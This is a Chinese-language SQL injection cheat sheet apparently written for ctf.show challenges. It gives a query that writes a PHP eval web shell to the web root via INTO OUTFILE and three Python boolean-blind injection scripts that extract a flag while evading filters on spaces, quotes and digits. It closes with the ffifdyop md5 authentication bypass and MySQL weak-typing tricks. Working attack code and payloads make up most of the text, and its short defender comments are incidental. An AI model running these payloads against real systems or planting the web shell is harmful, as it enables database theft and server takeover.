
SQL注入-1


过滤某些字符

使用Replace进行替代

如过滤数字

select username, replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password, 0, '!'), 1, '@'), 2, '#'), 3, '$'), 4, '%'), 5, '^'), 6, '&'), 7, '*'), 8, '('), 9, ')') from user;

直接写shell

SELECT 1, '<?php @eval($_POST[x]);?>' INTO OUTFILE '/var/www/html/1.php'

bool盲注小脚本

无空格

import requests
import time


def get_response(result: str) -> str | None:
    """Extend the recovered prefix by one character using a boolean oracle.

    Each candidate character from ``dic`` is appended to ``result`` and sent
    as the ``tableName`` POST field; a response whose text contains
    ``'$user_count = 1;'`` is treated as "the regexp matched".

    This is the "no spaces" variant: the template separates tokens with
    backticks instead of spaces.

    Args:
        result: The prefix recovered so far.

    Returns:
        ``result`` plus the first matching candidate, or ``None`` when no
        candidate matches (the loop falls off the end without a return).
    """
    url = 'http://e952e288-3d6c-4c73-9f3c-9bdf904827d5.challenge.ctf.show/select-waf.php'
    # Regexp anchored at the start so each probe tests one more prefix char.
    # Defender note: the field presumably ends up interpolated into SQL; an
    # allow-list of table names removes this whole class of oracle.
    payload = "`ctfshow_user`where`pass`regexp'^{}'"
    # Candidate alphabet, tried in this order at every position.
    dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
    data = {
        'tableName': payload
    }
    for word in dic:
        data['tableName'] = payload.format(result + word)
        response = requests.post(url, data=data)
        time.sleep(0.25)  # fixed pause between probes
        # The page text is the oracle: a positive index of the marker counts
        # as a hit (an index of 0 would not, because of the strict ``> 0``).
        if response.text.find('$user_count = 1;') > 0:
            result += word
            return result


if __name__ == '__main__':
    # Recover the value one character per call; 55 is presumably an upper
    # bound on the expected length.
    result = ''
    for i in range(55):
        # get_response returns None once no candidate matches; the following
        # call would then fail on ``None + word``.
        result = get_response(result)
        print(result)

有空格无引号

import requests
import time


def str2hex(string):
    """Return the lowercase hex code points of ``string`` joined without ``0x``.

    Each character contributes ``format(ord(ch), 'x')``: no zero padding, so a
    code point below 0x10 yields a single digit, exactly like ``hex(ord(ch))``
    with its ``0x`` prefix stripped.

    Args:
        string: Text to encode; may be empty.

    Returns:
        The concatenated hex digits, or ``''`` for empty input.
    """
    return ''.join(format(ord(ch), 'x') for ch in string)

def get_response(result: str) -> str | None:
    """Extend the recovered prefix by one character using a boolean oracle.

    This is the "spaces allowed, no quotes" variant: the regexp pattern is
    sent as a hex literal (``0x...``) built with ``str2hex`` so that no quote
    character appears in the request. A response whose text contains
    ``'$user_count = 1;'`` is treated as "the regexp matched".

    Args:
        result: The prefix recovered so far.

    Returns:
        ``result`` plus the first matching candidate, or ``None`` when no
        candidate in ``dic`` matches.
    """
    url = 'http://61dea855-662d-4843-bd43-4518d01c80f6.challenge.ctf.show/select-waf.php'
    # Defender note: stripping quotes does not neutralise an interpolated
    # field, since MySQL also accepts hex literals as strings; validate the
    # table name against an allow-list instead.
    payload = "ctfshow_user group by pass having pass regexp(0x{})"
    # Candidate alphabet, tried in this order at every position.
    dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
    data = {
        'tableName': payload
    }
    for word in dic:
        # Hex of the prefix followed by hex of the candidate, as one literal.
        data['tableName'] = payload.format(str2hex(result) + str2hex(word))
        response = requests.post(url, data=data)
        time.sleep(0.25)  # fixed pause between probes
        # A positive index of the marker in the page text counts as a hit.
        if response.text.find('$user_count = 1;') > 0:
            result += word
            return result


if __name__ == '__main__':
    # Recover the value one character per call; 55 is presumably an upper
    # bound on the expected length.
    result = ''
    for i in range(55):
        # get_response returns None once no candidate matches; the following
        # call would then fail on ``None + word``.
        result = get_response(result)
        print(result)

有空格无引号无数字

import requests
import time

# Spell each decimal digit '0'..'9' as a MySQL boolean expression that
# contains no digit characters: '0' -> 'false', '1' -> 'true',
# '2' -> 'true+true', ... (relies on MySQL evaluating true as 1).
true_dict = {
    '0': 'false',
    '1': 'true',
}
for i in range(2, 10):
    # i copies of 'true' joined by '+': 'true' followed by (i - 1) '+true'.
    true_dict[str(i)] = true_dict['1'] + '+true' * (i - 1)


def word2char(word: str) -> str:
    """Render one character as a digit-free ``char(concat(...))`` expression.

    The character's decimal code point is split into digits, each digit is
    replaced by its ``true_dict`` expression, and the pieces are wrapped as
    ``char(concat((d1),(d2),...))`` — presumably so the database reassembles
    the number and converts it back to the character.

    Args:
        word: A single character.

    Returns:
        The expression string; for code point 94 the digits 9 and 4 become
        ``char(concat((true+...+true),(true+true+true+true)))``.
    """
    num = str(ord(word))
    result = 'char(concat('
    for i in range(len(num)):
        # First digit has no leading comma; later digits are comma-separated.
        if i == 0:
            result += '(' + true_dict[num[i]] + ')'
        else:
            result += ',(' + true_dict[num[i]] + ')'
    result += '))'  # closes concat( and char(
    return result


def sentence2true(string: str) -> str:
    """Join the ``word2char`` rendering of every character with commas.

    Defender note: the output contains no digits and no quotes, so filtering
    those characters from a field is not a defence against interpolation;
    the field must be validated against an allow-list.

    Args:
        string: Text to encode; may be empty.

    Returns:
        Comma-separated ``char(concat(...))`` expressions, or ``''`` for an
        empty input. The caller splices this into a ``concat(...)`` argument list.
    """
    final_pass = ''
    if string:
        for i in range(len(string)):
            # First element has no leading comma; later ones are comma-separated.
            if i == 0:
                final_pass += word2char(string[i])
            else:
                final_pass += ',' + word2char(string[i])
        final_pass += ''  # no-op, kept as written
    return final_pass


def get_response(result: str) -> str | None:
    """Extend the recovered prefix by one character using a boolean oracle.

    This is the "spaces allowed, no quotes, no digits" variant: the regexp
    pattern is assembled server-side from ``char(concat(...))`` expressions
    produced by ``sentence2true``. A response whose text contains
    ``'$user_count = 1;'`` is treated as "the regexp matched".

    Args:
        result: The prefix recovered so far.

    Returns:
        ``result`` plus the first matching candidate, or ``None`` when no
        candidate in ``dic`` matches.
    """
    url = 'http://283b4efa-e5be-454c-8b79-58af5d20673d.challenge.ctf.show/select-waf.php'
    # The fixed char(concat((9 trues),(4 trues))) part is code point 94,
    # i.e. the '^' anchor; the placeholder receives the encoded prefix.
    # Defender note: the marker string in the page text is the information
    # leak; the page should not echo per-query counts derived from the field.
    payload = "ctfshow_user group by pass having pass regexp(concat(char(concat((true+true+true+true+true+true+true+true+true),(true+true+true+true))),{}))"
    # Candidate alphabet, tried in this order at every position.
    dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
    data = {
        'tableName': payload
    }
    for word in dic:
        data['tableName'] = payload.format(sentence2true(result + word))
        response = requests.post(url, data=data)
        time.sleep(0.25)  # fixed pause between probes
        # A positive index of the marker in the page text counts as a hit.
        if response.text.find('$user_count = 1;') > 0:
            result += word
            return result


if __name__ == '__main__':
    # Recover the value one character per call; 55 is presumably an upper
    # bound on the expected length.
    result = ''
    for i in range(55):
        # get_response returns None once no candidate matches; the following
        # call would then fail on ``None + word``.
        result = get_response(result)
        print(result)


ffifdyop 绕过

经过 md5 哈希后(十六进制):276f722736c95d99e921722cf9ed621c

再把这段原始摘要字节当作字符串:开头为 'or'6,其余为不可打印字节(显示为乱码)

用法

select * from admin where password=''or'6<乱码>'

由于 '6<乱码>' 在数值比较中被 MySQL 转换为数字 6(非零即为真),就相当于 select * from admin where password=''or 1,从而实现 sql 注入


MySQL弱类型

select pass from ctfshow_user where username = 0;
# Comparing a string column with an integer makes MySQL cast the string to a
# number; a value with no leading digit becomes 0, so this matches every
# username that starts with a letter (any non-numeric prefix, in fact).
select pass from ctfshow_user where username = 1;
# Matches usernames whose numeric prefix converts to exactly 1 (e.g. "1abc"),
# not ones starting with other digit sequences such as "12abc".